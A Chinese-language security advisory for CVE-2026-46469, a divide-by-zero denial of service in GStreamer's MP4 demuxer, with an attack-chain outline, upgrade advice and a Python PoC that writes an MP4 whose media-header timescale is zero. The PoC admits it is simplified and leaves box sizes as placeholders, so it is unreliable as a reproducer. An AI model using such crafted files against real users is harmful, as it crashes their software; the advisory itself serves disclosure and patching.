CVE-2026-46469: GStreamer整数除零拒绝服务漏洞

漏洞信息

漏洞编号

CVE-2026-46469

漏洞类型

拒绝服务

CVSS评分

4.0 中危

攻击向量

本地 (AV:L)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

GStreamer gst-plugins-good

漏洞概述

GStreamer gst-plugins-good 1.28.2之前的版本中存在一个安全漏洞。当解析MP4音频轨道时，isomp4插件中的qtdemux_parse_trak函数未能充分验证原子数据的合法性。在进行除法操作前缺乏必要的边界检查与验证，导致整数除零异常的发生，进而引发应用程序拒绝服务。攻击者可利用此漏洞通过诱导用户解析特制文件来中断服务。

技术细节

该漏洞主要影响GStreamer多媒体框架中的gst-plugins-good模块，具体位于处理MP4容器的isomp4插件内。漏洞根源在于`qtdemux_parse_trak`函数在解析MP4音频轨道的原子数据时，未对从文件中读取的特定参数进行有效性校验，直接将其用于除法运算。攻击者可以精心构造一个特制的MP4音频文件，其中包含导致除数为零的恶意原子结构。当GStreamer解析该文件时，会触发整数除零异常。由于缺乏异常处理机制，这将导致应用程序崩溃或停止响应。虽然攻击向量为本地，但通过诱导用户打开恶意音频文件，即可实现拒绝服务攻击，影响系统可用性。

攻击链分析

STEP 1

1. 恶意文件构造

攻击者分析GStreamer MP4解析逻辑，构造包含特定原子数据的恶意MP4音频文件，其中包含导致除数为零的字段。

STEP 2

2. 文件投递

攻击者将构造好的恶意MP4文件发送给目标用户，或放置在用户可能访问的本地存储中。

STEP 3

3. 触发解析

目标用户使用受影响版本的GStreamer播放器或应用程序打开或解析该恶意MP4文件。

STEP 4

4. 拒绝服务

应用程序在解析`qtdemux_parse_trak`函数时触发整数除零异常，导致进程崩溃或挂起，造成服务不可用。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import struct

# Generate a minimal MP4 file structure with a malformed atom
# This PoC simulates creating an MP4 where a critical atom field is zero,
# potentially triggering the division by zero in qtdemux_parse_trak.

def create_malformed_mp4(filename):
    with open(filename, 'wb') as f:
        # Minimal ftyp box
        f.write(struct.pack('>I4s', 20, b'ftyp'))
        f.write(b'isom')
        f.write(struct.pack('>I', 0))
        
        # Moov box start
        moov_start = f.tell()
        f.write(struct.pack('>I4s', 0, b'moov')) # Size placeholder
        
        # Trak box
        trak_start = f.tell()
        f.write(struct.pack('>I4s', 0, b'trak')) # Size placeholder
        
        # Mdia box
        mdia_start = f.tell()
        f.write(struct.pack('>I4s', 0, b'mdia')) # Size placeholder
        
        # Mdhd box (Media Header) - often contains timescale used for division
        # Setting timescale to 0 might trigger division by zero in duration calculations
        mdhd_size = 32
        f.write(struct.pack('>I4s', mdhd_size, b'mdhd'))
        f.write(struct.pack('>I', 0)) # Version/Flags
        f.write(struct.pack('>I', 0)) # Creation time
        f.write(struct.pack('>I', 0)) # Modification time
        f.write(struct.pack('>I', 0)) # Timescale = 0 (MALFORMED)
        f.write(struct.pack('>I', 100)) # Duration
        f.write(struct.pack('>H', 0x55c4)) # Language
        f.write(struct.pack('>H', 0)) # Pre-defined
        
        # Update sizes
        # ... (simplified for PoC representation, actual padding needed for valid parse)
        # This is a conceptual PoC to demonstrate the trigger mechanism.
        
if __name__ == '__main__':
    create_malformed_mp4('cve_2026_46469_poc.mp4')
    print('Malformed MP4 file generated: cve_2026_46469_poc.mp4')

影响范围

GStreamer gst-plugins-good < 1.28.2

防御指南

临时缓解措施

建议用户立即将GStreamer gst-plugins-good更新到1.28.2或更高版本。如果无法立即更新，应避免使用受影响的GStreamer组件处理来源不明或不可信的MP4音频文件，以降低被攻击风险。